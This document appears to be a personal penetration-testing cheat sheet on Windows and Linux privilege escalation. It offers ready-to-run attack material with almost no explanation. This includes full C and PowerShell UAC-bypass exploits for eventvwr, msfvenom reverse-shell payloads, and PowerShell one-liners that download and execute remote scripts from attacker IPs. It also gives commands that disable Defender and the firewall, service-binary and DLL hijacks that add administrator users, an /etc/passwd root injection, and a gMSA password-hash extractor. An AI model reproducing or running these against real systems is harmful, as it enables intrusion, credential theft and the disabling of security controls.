PrivESC
Privilege Escalation 
Windows
Find Files
findstr /si password *.txt
dir /s *foo*
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
dir "c:\Program Files (x86)"
dir "C:\Program Files"
dir /s /b /a:-d-h \Users\alfred | findstr /i /v "appdata"
Add user
net user Administrator 5HdY8BR9eeL #changepasswd
net user usuario1 5HdY8BR9eeL /add #adduser
net localgroup administrators usuario1 /add
net localgroup "Remote Desktop Users" UserLoginName /add # adduser to RDP
System Information
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
hostname
echo %username%
whoami /groups
whoami /all
net users
net user usuario111
mountvol
C:\Windows\System32\drivers\etc\hosts
reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ # EnableLUA = 1 is activated
whoami /priv
whoami /user
net use
net share
net localgroup administrators
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows" # servicios al inicio
qwinsta
[Environment]::Is64BitProcess
Credentials
cmdkey /list
dir /s Unattend.xml
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Network Information
netstat -ano
netstat -ano |findstr "LISTENING"
ipconfig /all
route print
netstat -ano
arp -A
Firewall Rules
#cmd
netsh firewall show state
netsh firewall show config
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
netsh advfirewall show allprofiles state
netsh advfirewall firewall show rule name=all
netsh advfirewall set allprofiles state off #disable
netsh advfirewall reset #reset default
#powershell
get-netfirewallrule -all
get-netfirewallrule -policystore configurableservicestore -all
Get-NetFirewallRule -Direction Inbound -Enabled True
#open port
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=out action=allow protocol=TCP localport=139
Process and Services
#CMD
net start
tasklist /SVC
tasklist /svc | findstr /spin "string we search"
tasklist | findstr "nameofstring"
taskkill /IM "process name" /F
taskkill /F /PID pid_number
driverquery /v
schtasks /query /fo LIST /v #tareas programadas
#Powershell
taskkill /F /PID pid_number
Get-Process
Stop-Process -Name "ProcessName" -Force
Stop-Process -ID PID -Force
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"} #select app
Defender
sc query windefend # check defender
sc stop WinDefend
Set-MpPreference -DisableRealtimeMonitoring $true # disable real-time monitoring
Uninstall-WindowsFeature -Name Windows-Defender #Uninstall Defender
Applications
wmic product get name, version, vendor # applications
wmic qfe get Caption, Description, HotFixID, InstalledOn # updates
wmic service list brief | findstr "Running" # services
sc qc RemoteMouseService # info app
Powershell Bypass
Get-ExecutionPolicy -List
powershell.exe -nop -exec bypass
Set-ExecutionPolicy Unrestricted -Scope CurrentUser
powershell -ExecutionPolicy Bypass -File admin.ps1
powershell -ExecutionPolicy Bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.229/Invoke-PowerShellTcp.ps1')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe .\file.ps1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe .\file.ps1
#Disable
Set-ExecutionPolicy Unrestricted
Get-ExecutionPolicy
powershell.exe Start-Process cmd.exe -Verb runAs
runas /user:admin "C:\Windows\notepad.exe"
runas /netonly /user:mycorp.local\adminacm "cmd /c SHUTDOWN -m \\DES00028 -r -f"
#Powershell01
$pass =ConvertTo-SecureString 'Passw0rd2' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("morty.smith", $pass)
Invoke-Command -Computer localhost -ScriptBlock { whoami } -Credential $pass
#Powershell02
$username = 'svc_mssql'
$password = 'trustno1'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process reverse.exe -Credential $credential
#Invoke-RunasCs
https://github.com/antonioCoco/RunasCs
. .\Invoke-RunasCs.ps1
Invoke-RunasCs svc_mssql trustno1 whoami
Invoke-RunasCs -Username user1 -Password password1 -Command
#Remote Powershell Session
$username = "access\svc_mssql";
$password = "trustno1";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr;
new-pssession -computername nameofthehost -credential $cred;
enter-pssession 1
#Remote Powershell Session THM way
$username = 'Administrator';
$password = 'Mypass123';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
Enter-PSSession -Computername TARGET -Credential $credential
#launch command with scriptblock
Invoke-Command -Computername TARGET -Credential $credential -ScriptBlock {whoami}
Tricks
Bypass eventvwr.exe
# Check privs
whoami /priv
# EnableLUA = 1 is activated
reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\
# check if evetvwr.exe exists
where /r C:\windows eventvwr.exe
# 32bits
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.119.205 LPORT=3333 -f exe -o 3333.exe
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.119.205 LPORT=4444 -f exe -o 4444.exe
# 64bits
msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=192.168.119.205 LPORT=3333 -f exe -o 3333.exe
msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=192.168.119.205 LPORT=3333 -f exe -o 4444.exe
compile
i686-w64-mingw32-gcc exploit.c -o exploit.exe # 32bits
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe # 64bits
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
/*
* Pretty standard code to recursively nuke a Reg Key
*/
int RegDelnodeRecurse (LPTSTR lpSubKey) {
LPTSTR lpEnd;
LONG lResult;
DWORD dwSize = MAX_PATH;
TCHAR szName[MAX_PATH];
HKEY hKey;
FILETIME ftWrite;
lResult = RegDeleteKey(HKEY_CURRENT_USER, lpSubKey);
if (lResult == ERROR_SUCCESS) return 1;
lResult = RegOpenKeyEx(HKEY_CURRENT_USER, lpSubKey, 0, KEY_READ, &hKey);
if (lResult != ERROR_SUCCESS) return lResult == ERROR_FILE_NOT_FOUND;
lpEnd = lpSubKey + lstrlen(lpSubKey);
*lpEnd++ = '\\';
*lpEnd = '\0';
if (RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite) == ERROR_SUCCESS) {
do {
strcpy(lpEnd, szName);
if (!RegDelnodeRecurse(lpSubKey)) break;
lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite);
} while (lResult == ERROR_SUCCESS);
}
lpEnd--;
*lpEnd = TEXT('\0');
RegCloseKey(hKey);
return RegDeleteKey(HKEY_CURRENT_USER, lpSubKey) == ERROR_SUCCESS;
}
/*
* Wrapper for above
*/
int RegDelnode() {
TCHAR szDelKey[MAX_PATH*2] = "Software\\Classes\\mscfile";
return RegDelnodeRecurse(szDelKey);
}
void __c_exploitUAC() {
char curPath[MAX_PATH], evtVwr[MAX_PATH];
HKEY attackKey;
SHELLEXECUTEINFO exInfo;
/*
curPath is the command you want to elevate.
Below is an example that shows how to elevate
foobar.exe sitting in the same path as this
program.
*/
GetCurrentDirectory(MAX_PATH, curPath);
strcat(curPath, "\\3333.exe");
sprintf(evtVwr, "%s\\System32\\eventvwr.exe", getenv("SYSTEMROOT"));
if(!RegDelnode()) return;
if(RegCreateKey(HKEY_CURRENT_USER, "Software\\Classes\\mscfile\\shell\\open\\command", &attackKey)!=ERROR_SUCCESS) return;
RegSetValueEx(attackKey, "", 0, REG_SZ, curPath, strlen(curPath));
exInfo.lpVerb = "open";
exInfo.lpFile = evtVwr;
exInfo.nShow = 0;
exInfo.fMask = SEE_MASK_NOCLOSEPROCESS;
exInfo.cbSize = sizeof(SHELLEXECUTEINFO);
exInfo.hwnd = 0;
exInfo.lpParameters = 0;
exInfo.lpDirectory = 0;
exInfo.hInstApp = 0;
ShellExecuteEx(&exInfo);
Sleep(5000);
TerminateProcess(exInfo.hProcess, 0);
RegCloseKey(attackKey);
RegDelnode();
}
int main(int argc, char *argv[]) {
__c_exploitUAC();
return 0;
}
1. Upload to target exploit.exe + 2xrevshells + PsExec
2. listen with nc on 3333 and run exploit.exe
3. listen with nc on 4444 and with new shell run :
c:\> PsExec.exe -i -accepteula -d -s c:\path\4444.exe
4. You have new admin shell
https://github.com/CsEnox/EventViewer-UACBypass
function Invoke-EventViewer {
if ($args){
echo "[+] Running"
echo "[1] Crafting Payload"
$command = $args[0]
# Closes Event Viewer and then runs user commmand.
echo 'Stop-Process -name mmc*' > C:\Windows\Tasks\EventViewerRCE.ps1
echo $command >> C:\Windows\Tasks\EventViewerRCE.ps1
$payload = 'AAEAAAD/////AQAAAAAAAAAMAgAAAE5TeXN0ZW0uRGF0YSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAABNTeXN0ZW0uRGF0YS5EYXRhU2V0CgAAABZEYXRhU2V0LlJlbW90aW5nRm9ybWF0E0RhdGFTZXQuRGF0YVNldE5hbWURRGF0YVNldC5OYW1lc3BhY2UORGF0YVNldC5QcmVmaXgVRGF0YVNldC5DYXNlU2Vuc2l0aXZlEkRhdGFTZXQuTG9jYWxlTENJRBpEYXRhU2V0LkVuZm9yY2VDb25zdHJhaW50cxpEYXRhU2V0LkV4dGVuZGVkUHJvcGVydGllcxREYXRhU2V0LlRhYmxlcy5Db3VudBBEYXRhU2V0LlRhYmxlc18wBAEBAQAAAAIABx9TeXN0ZW0uRGF0YS5TZXJpYWxpemF0aW9uRm9ybWF0AgAAAAEIAQgCAgAAAAX9////H1N5c3RlbS5EYXRhLlNlcmlhbGl6YXRpb25Gb3JtYXQBAAAAB3ZhbHVlX18ACAIAAAABAAAABgQAAAAACQQAAAAJBAAAAAAJBAAAAAoBAAAACQUAAAAPBQAAAH8EAAACAAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAAoQc8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI/Pg0KPE9iamVjdERhdGFQcm92aWRlciBNZXRob2ROYW1lPSJTdGFydCIgSXNJbml0aWFsTG9hZEVuYWJsZWQ9IkZhbHNlIiB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIiB4bWxuczpzZD0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uRGlhZ25vc3RpY3M7YXNzZW1ibHk9U3lzdGVtIiB4bWxuczp4PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCI+DQogIDxPYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQogICAgPHNkOlByb2Nlc3M+DQogICAgICA8c2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgICAgIDxzZDpQcm9jZXNzU3RhcnRJbmZvIEFyZ3VtZW50cz0iL2MgcG93ZXJzaGVsbC5leGUgLW5vcCAtZSBVd0JsQUhRQUxRQkZBSGdBWlFCakFIVUFkQUJwQUc4QWJnQlFBRzhBYkFCcEFHTUFlUUFnQUVJQWVRQndBR0VBY3dCekFDQUFMUUJUQUdNQWJ3QndBR1VBSUFCREFIVUFjZ0J5QUdVQWJnQjBBRlVBY3dCbEFISUFPd0FnQUVNQU9nQmNBRmNBYVFCdUFHUUFid0IzQUhNQVhBQlVBR0VBY3dCckFITUFYQUJGQUhZQVpRQnVBSFFBVmdCcEFHVUFkd0JsQUhJQVVnQkRBRVVBTGdCd0FITUFNUUE9IiBTdGFuZGFyZEVycm9yRW5jb2Rpbmc9Int4Ok51bGx9IiBTdGFuZGFyZE91dHB1dEVuY29kaW5nPSJ7eDpOdWxsfSIgVXNlck5hbWU9IiIgUGFzc3dvcmQ9Int4Ok51bGx9IiBEb21haW49IiIgTG9hZFVzZXJQcm9maWxlPSJGYWxzZSIgRmlsZU5hbWU9ImNtZCIgLz4NCiAgICAgIDwvc2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgPC9zZDpQcm9jZXNzPg0KICA8L09iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCjwvT2JqZWN0RGF0YVByb3ZpZGVyPgsL'
[IO.File]::WriteAllBytes("C:\Windows\Tasks\p4yl0ad", [Convert]::FromBase64String($payload))
echo "[2] Writing Payload"
WriteFile
echo "[3] Finally, invoking eventvwr"
eventvwr
}
else {
echo '[-] Usage: Invoke-EventViewer commandhere'
echo 'Example: Invoke-EventViewer cmd.exe'
}
}
function WriteFile {
$Folder = $env:LOCALAPPDATA+'\Microsoft\Event Viewer'
if (Test-Path -Path $Folder) {
"[+] EventViewer Folder exists"
copy C:\Windows\Tasks\p4yl0ad $env:LOCALAPPDATA\Microsoft\EventV~1\RecentViews
} else {
"[+] EventViewer Folder doesn't exist. Will create one"
mkdir $Folder
copy C:\Windows\Tasks\p4yl0ad $Folder\RecentViews
}
}
Weakness Service
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} # like tasklist
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | Select-String 'Program Files' # like tasklist with grep
icacls "C:\Program Files\Serviio\bin\ServiioService.exe" # service permission
wmic service where caption="Serviio" get name, caption, state, startmode # service info
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user usuario1 p4ssw0rd /add");
i = system ("net localgroup administrators usuario1 /add");
return 0;
}
i686-w64-mingw32-gcc adduser.c -o adduser.exe
#Replace service
move "c:\Program Files\Serviio\bin\ServiioService.exe" old.exe
move adduser.exe "c:\Program Files\Serviio\bin\ServiioService.exe"
#Restart service or restart machine
wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]
shutdown /r /t 0
#Check new user
net users
net localgroup administrators
DLL Hijacking
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
ExitProcess(0);
}
return TRUE;
}
x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
sc stop dllsvc & sc start dllsvc
Unquoted Service
wmic service get name,displayname,pathname,startmode
sc qc unquotedsvc
.\accesschk64.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service"
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.74.25 LPORT=443 -f exe -o evil.exe
sc stop unquotedsvc
sc start unquotedsvc
AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
msfvenom -p windows/adduser USER=hodor PASS=Qwerty123! -f msi -o hodor.msi
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.193.228 LPORT=443 -f msi -o evil.msi
msiexec /quiet /qn /i C:\evil.msi
SysInternals
powershell winget install sysinternals
#CMD
AccessChk -uws "Everyone" "C:\Program Files"
accesschk.exe -uwcqv "testuser" *
#Powershell
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
Sigcheck -a -m C:\Windows\System32\fodhelper.exe
PsExec.exe \\dc01 cmd.exe
psexec64.exe \\MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe
Abuses
ReadGMSAPassword
Get-ADServiceAccount -Filter *
Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword
Get-ADServiceAccount -Identity 'svc_apache' -Properties 'msDS-ManagedPassword'
(Get-ADServiceAccount -Identity 'svc_apache' -Properties 'msDS-ManagedPassword').'msDS-MAnagedPassword'
1) save numbers to file gmsa
2) convert to onliner:
cat gmsa | tr "\n" "," > gmsacoma
3) replace output in gmsadecode.py data = []
#!/usr/bin/env python3
from ldap3 import ALL, Server, Connection, NTLM, SASL, KERBEROS, extend, SUBTREE
import argparse
import binascii
from Cryptodome.Hash import MD4
from impacket.ldap.ldaptypes import ACE, ACCESS_ALLOWED_OBJECT_ACE, ACCESS_MASK, LDAP_SID, SR_SECURITY_DESCRIPTOR
from impacket.structure import Structure
import sys
data = []
data = bytes(data)
class MSDS_MANAGEDPASSWORD_BLOB(Structure):
structure = (
('Version','<H'),
('Reserved','<H'),
('Length','<L'),
('CurrentPasswordOffset','<H'),
('PreviousPasswordOffset','<H'),
('QueryPasswordIntervalOffset','<H'),
('UnchangedPasswordIntervalOffset','<H'),
('CurrentPassword',':'),
('PreviousPassword',':'),
#('AlignmentPadding',':'),
('QueryPasswordInterval',':'),
('UnchangedPasswordInterval',':'),
)
def __init__(self, data = None):
Structure.__init__(self, data = data)
def fromString(self, data):
Structure.fromString(self,data)
if self['PreviousPasswordOffset'] == 0:
endData = self['QueryPasswordIntervalOffset']
else:
endData = self['PreviousPasswordOffset']
self['CurrentPassword'] = self.rawData[self['CurrentPasswordOffset']:][:endData - self['CurrentPasswordOffset']]
if self['PreviousPasswordOffset'] != 0:
self['PreviousPassword'] = self.rawData[self['PreviousPasswordOffset']:][:self['QueryPasswordIntervalOffset']-self['PreviousPasswordOffset']]
self['QueryPasswordInterval'] = self.rawData[self['QueryPasswordIntervalOffset']:][:self['UnchangedPasswordIntervalOffset']-self['QueryPasswordIntervalOffset']]
self['UnchangedPasswordInterval'] = self.rawData[self['UnchangedPasswordIntervalOffset']:]
blob = MSDS_MANAGEDPASSWORD_BLOB()
blob.fromString(data)
hash = MD4.new ()
hash.update (blob['CurrentPassword'][:-2])
passwd = binascii.hexlify(hash.digest()).decode("utf-8")
print(passwd)
# python3 gmsadecode.py
1808d2c09d9e6a0edc419a4b13868c92
SeRestorePrivilege
move C:\Windows\System32\utilman.exe C:\Windows\System32\utilman.old
move C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
rdesktop 192.168.120.91
Press WIN + U
#links
https://github.com/xct/SeRestoreAbuse
https://github.com/dxnboy/redteam
#Exploit
.\SeRestoreAbuse.exe "cmd /c powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.49.164/shell.ps1')"
SeBackupPrivilege
function Acl-FullControl {param ($user,$path)
$help = @"
.SYNOPSIS
Acl-FullControl
PowerShell Function: Acl-FullControl
Author: Luis Vacas (CyberVaca)
Required dependencies: None
Optional dependencies: None
.DESCRIPTION
.EXAMPLE
Acl-FullControl -user domain\usuario -path c:\users\administrador
Description
-----------
If you have the SeBackupPrivilege privilege. You can change the permissions to the path you select.
"@
if ($user -eq $null -or $path -eq $null) {$help} else {
"[+] Current permissions:"
get-acl $path | fl
"[+] Changing permissions to $path"
$acl = get-acl $path
$aclpermisos = $user,'FullControl','ContainerInherit,ObjectInherit','None','Allow'
$permisoacl = new-object System.Security.AccessControl.FileSystemAccessRule $aclpermisos
$acl.AddAccessRule($permisoacl)
set-acl -Path $path -AclObject $acl
"[+] Acls changed successfully."
get-acl -path $path | fl
}
}
. .\Acl-FullControl.ps1
Acl-FullControl -user VAULT\anirudh -path c:\users\administrator
SeCreateGlobalPrivilege
PS C:\wamp> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
#Link
https://github.com/itm4n/FullPowers
#Run
FullPowers.exe -x
FullPowers.exe -c "c:\users\Public\Music\r.exe"
#Now you have full privileges and exploit with impersonate
SeManageVolumePrivilege
C:\Windows\system32>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ================================ ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\xampp\htdocs\uploads>SeManageVolumeExploit.exe
Entries changed: 918
DONE
GPOabuse
Get-NetGPO
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
Get-GPPermission -Guid 31B2F340-016D-11D2-945F-00C04FB984F9 -TargetType User -TargetName anirudh
#Link
https://github.com/FuzzySecurity/StandIn
#Check
.\standin --gpo
.\standin --gpo --filter "Default Domain Policy" --acl
#Exploit
.\standin --gpo --filter "Default Domain Policy" --localadmin anirudh
gpupdate /force
net localgroup administrators
#Link
https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.0_x86/SharpGPOAbuse.exe
#Exploit
./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"
gpupdate /force
net localgroup administrators
Helpers
#WCMDump
https://github.com/peewpw/Invoke-WCMDump
.\Invoke-WCMDump.ps1
#WinPeas
https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
Winpeas.exe > out.txt
#PowerUp
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
. .\PowerUp.ps1
Invoke-AllChecks
#Suggester
https://github.com/bitsadmin/wesng
pip install wesng
wes –update
systeminfo > systeminfo.txt
wes systeminfo.txt
#sharpup
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
SharpUp.exe audit
SharpUp.exe HijackablePaths
SharpUp.exe UnquotedServicePath
SharpUp.exe AlwaysInstallElevated
#PrivescCheck
https://github.com/itm4n/PrivescCheck
. .\PrivescCheck.ps1
Invoke-PrivescCheck
#Sherlock
https://github.com/rasta-mouse/Sherlock
. .\Sherlock.ps1
Find-AllVulns
Linux
Enumeration
lsblk
hostname
/proc/version
ps aux - ps axjf
/etc/passwd
.bash_history or history
netstat -putan
ifconfig or ip a
cat /etc/os-release or cat /etc/issue
uname -a
id
sudo -l
cat /etc/fstab
env
ls -alt $(find / -perm -4000 -type f 2>/dev/null)
find / -user vivek 2>/dev/null
find / -writable -type d 2>/dev/null
find / -mtime 10 # modificados ultimos 10dias
cat /etc/crontab && ls -altR /etc/cron*
which perl && which python && which gcc
find . -type f -exec grep -inH "password" {} \;
Cron files
grep -i cron /var/log/cron.log |grep -i cmd
grep CRON /var/log/syslog
ls -altR /etc/cron*
Passwd writeable
openssl passwd p4ssw0rd
echo "root2:AK24fcSx2Il3I:0:0:root:/root:/bin/bash" >> /etc/passwd
Tools
LinPeas https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
LinEnum https://github.com/rebootuser/LinEnum
Linux Exploit Suggester https://github.com/mzet-/linux-exploit-suggester
Linux Smart Enumeration https://github.com/diego-treitos/linux-smart-enumeration
Linux Priv Checker https://github.com/linted/linuxprivchecker
Getcaps
getcap -r / 2>/dev/null
NFS no_root_squash
cat /etc/exports
mount -t nfs 10.1.1.27:/srv/Share share/
cp sushi share/
chmod 4755 share/sushi
Samba
SMBmap
smbmap -H 192.168.1.135
smbmap -u offsec -p lab -H 192.168.1.135
smbmap -H 10.11.1.146 -r 'SusieShare'
smbmap -H 10.11.1.146 --download 'SusieShare/FsSRC.txt'
smbmap -H 10.11.1.136 -R 'Bob Share\rootdir' -A "authorized_keys"
SMBclient
smbclient -N -L \\192.168.1.135
smbclient //192.168.1.136/share$
smbclient -U 'svc-admin%management2005' -L \\10.10.92.76
smbclient //10.10.92.76/backup -c 'cd folder;get backup_credentials.txt' -U 'svc-admin%management2005'
RPCclient
rpcclient -U "" 10.10.10.10
Mount
mount -t cifs //10.11.1.31/wwwroot wwwroot/
mount -t cifs //server-name/share-name /mnt/cifs -o username=shareuser,password=sharepassword,domain=nixcraft
· trans2root - Samba 2.2.x
· EternalBlue - MS17-010 - Mount Null IPC$
· SambaCry - Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14
· Symlink directory traversal - Samba 3.0.x
· SMBv2 - CVE-2009-3103 - Windows Vista SP1/SP2 and Server 2008